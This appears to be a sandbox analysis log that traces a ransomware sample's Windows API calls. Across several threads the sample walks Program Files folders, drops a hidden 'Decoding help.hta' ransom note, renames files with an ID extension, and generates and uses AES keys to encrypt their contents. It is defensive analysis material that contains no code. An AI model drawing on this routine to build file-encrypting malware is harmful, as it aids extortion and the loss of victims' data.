[0055.685] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0055.685] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.685] FindNextFileW (in: hFindFile=0x5d8190, lpFindFileData=0x2861fd30 | out: lpFindFileData=0x2861fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11d8d700, ftCreationTime.dwHighDateTime=0x1c07b1f, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x11d8d700, ftLastWriteTime.dwHighDateTime=0x1c07b1f, nFileSizeHigh=0x0, nFileSizeLow=0x4c450, dwReserved0=0x0, dwReserved1=0x0, cFileName="CAGCAT10.MML", cAlternateFileName="")) returned 1 [0055.859] lstrcpyW (in: lpString1=0x5c98390, lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\*.*" [0055.859] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\*.*") returned 61 [0055.859] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\Decoding help.hta" [0055.859] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\decoding help.hta")) returned 0xffffffff [0055.859] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x808 [0057.400] WriteFile (in: hFile=0x808, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2861fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2861fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0057.401] CloseHandle (hObject=0x808) returned 1 [0057.401] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0057.402] lstrcmpiW (lpString1="Decoding help.hta", lpString2="CAGCAT10.MML") returned 1 [0057.402] lstrlenW (lpString="CAGCAT10.MML") returned 12 [0057.402] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\*.*" [0057.402] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\*.*") returned 61 [0057.402] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\", lpString2="CAGCAT10.MML" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML" [0057.402] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML" [0057.402] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML.[ID]g9uZrLhJaygpwRm1[ID]" [0057.402] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0057.403] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x808 [0057.403] CreateFileMappingA (hFile=0x808, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3b8 [0057.403] CryptAcquireContextA (in: phProv=0x2861fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2861fcec*=0x3449f08) returned 1 [0060.133] CryptGenKey (in: hProv=0x3449f08, Algid=0x6610, dwFlags=0x1, phKey=0x2861fce8 | out: phKey=0x2861fce8*=0x5db878) returned 1 [0060.133] CryptExportKey (in: hKey=0x5db878, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2861fbe4, pdwDataLen=0x2861fce4 | out: pbData=0x2861fbe4*, pdwDataLen=0x2861fce4*=0x2c) returned 1 [0060.133] MapViewOfFile (hFileMappingObject=0x3b8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4c440) returned 0x4690000 [0063.816] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2861fbe4*, pdwDataLen=0x2861fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x2861fbe4*, pdwDataLen=0x2861fcf8*=0x100) returned 1 [0063.817] CryptEncrypt (hKey=0x5db878, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4690000, pdwDataLen=0x2861fce4*=0x4c440, dwBufLen=0x4c440) Thread: id = 855 os_tid = 0xbfc [0054.665] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*.*", lpFindFileData=0x2875fd30 | out: lpFindFileData=0x2875fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5279f530, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd504b000, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5830 [0056.135] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.135] FindNextFileW (in: hFindFile=0x5a5830, lpFindFileData=0x2875fd30 | out: lpFindFileData=0x2875fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5279f530, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd504b000, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.135] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.135] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.135] FindNextFileW (in: hFindFile=0x5a5830, lpFindFileData=0x2875fd30 | out: lpFindFileData=0x2875fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd5024ea0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x2760, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTOInstallerUI.dll", cAlternateFileName="VSTOIN~1.DLL")) returned 1 [0056.581] lstrcpyW (in: lpString1=0x986a728, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*.*" [0056.582] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*.*") returned 75 [0056.582] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\Decoding help.hta" [0056.582] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\1033\\decoding help.hta")) returned 0xffffffff [0056.582] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\1033\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb84 [0060.494] WriteFile (in: hFile=0xb84, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2875fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2875fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.595] CloseHandle (hObject=0xb84) returned 1 [0061.595] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 856 os_tid = 0xabc [0054.666] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*", lpFindFileData=0x2889fd30 | out: lpFindFileData=0x2889fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a11cd0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6716b0 [0054.666] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.666] FindNextFileW (in: hFindFile=0x6716b0, lpFindFileData=0x2889fd30 | out: lpFindFileData=0x2889fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a11cd0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.666] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.666] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.666] FindNextFileW (in: hFindFile=0x6716b0, lpFindFileData=0x2889fd30 | out: lpFindFileData=0x2889fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a11cd0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0054.667] lstrcmpW (lpString1=".", lpString2="css") returned -1 [0054.667] lstrcmpW (lpString1="..", lpString2="css") returned -1 [0054.667] lstrcmpiW (lpString1="windows", lpString2="css") returned 1 [0054.667] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*" [0054.667] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*") returned 76 [0054.667] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\", lpString2="css" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css" [0054.667] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\*.*" [0054.667] GlobalMemoryStatus (in: lpBuffer=0x2889fd10 | out: lpBuffer=0x2889fd10) [0054.667] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10d9ec88, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x368 [0054.671] CloseHandle (hObject=0x368) returned 1 [0054.671] FindNextFileW (in: hFindFile=0x6716b0, lpFindFileData=0x2889fd30 | out: lpFindFileData=0x2889fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1792, dwReserved0=0x0, dwReserved1=0x0, cFileName="currency.html", cAlternateFileName="")) returned 1 [0054.674] lstrcpyW (in: lpString1=0x2a840698, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*" [0054.674] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*") returned 76 [0054.674] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\Decoding help.hta" [0054.674] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\decoding help.hta")) returned 0xffffffff [0054.674] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0054.675] WriteFile (in: hFile=0x368, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2889fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2889fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0055.534] CloseHandle (hObject=0x368) returned 1 [0056.935] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.458] lstrcmpiW (lpString1="Decoding help.hta", lpString2="currency.html") returned 1 [0058.458] lstrlenW (lpString="currency.html") returned 13 [0058.458] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*" [0058.458] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*") returned 76 [0058.458] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\", lpString2="currency.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\currency.html") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\currency.html" [0058.458] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\currency.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\currency.html") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\currency.html" [0058.458] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\currency.html", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\currency.html.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\currency.html.[ID]g9uZrLhJaygpwRm1[ID]" [0058.458] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\currency.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\currency.html"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\currency.html.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\currency.html.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.459] FindNextFileW (in: hFindFile=0x6716b0, lpFindFileData=0x2889fd30 | out: lpFindFileData=0x2889fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x7a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 1 [0058.459] lstrcpyW (in: lpString1=0x2a840698, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*" [0058.459] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*") returned 76 [0058.459] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\Decoding help.hta" [0058.459] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\decoding help.hta")) returned 0x1 [0058.459] lstrcmpiW (lpString1="Decoding help.hta", lpString2="gadget.xml") returned -1 [0058.459] lstrlenW (lpString="gadget.xml") returned 10 [0058.459] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*" [0058.459] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*") returned 76 [0058.459] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\", lpString2="gadget.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\gadget.xml") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\gadget.xml" [0058.459] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\gadget.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\gadget.xml") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\gadget.xml" [0058.459] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\gadget.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0058.459] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\gadget.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\gadget.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.094] FindNextFileW (in: hFindFile=0x6716b0, lpFindFileData=0x2889fd30 | out: lpFindFileData=0x2889fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a11cd0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0059.094] lstrcmpW (lpString1=".", lpString2="js") returned -1 [0059.094] lstrcmpW (lpString1="..", lpString2="js") returned -1 [0059.094] lstrcmpiW (lpString1="windows", lpString2="js") returned 1 [0059.094] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*" [0059.094] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*") returned 76 [0059.094] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\", lpString2="js" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js" [0059.094] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\*.*" [0059.094] GlobalMemoryStatus (in: lpBuffer=0x2889fd10 | out: lpBuffer=0x2889fd10) [0059.094] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x25360190, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd84 [0059.095] CloseHandle (hObject=0xd84) returned 1 [0059.095] FindNextFileW (in: hFindFile=0x6716b0, lpFindFileData=0x2889fd30 | out: lpFindFileData=0x2889fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a11cd0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, 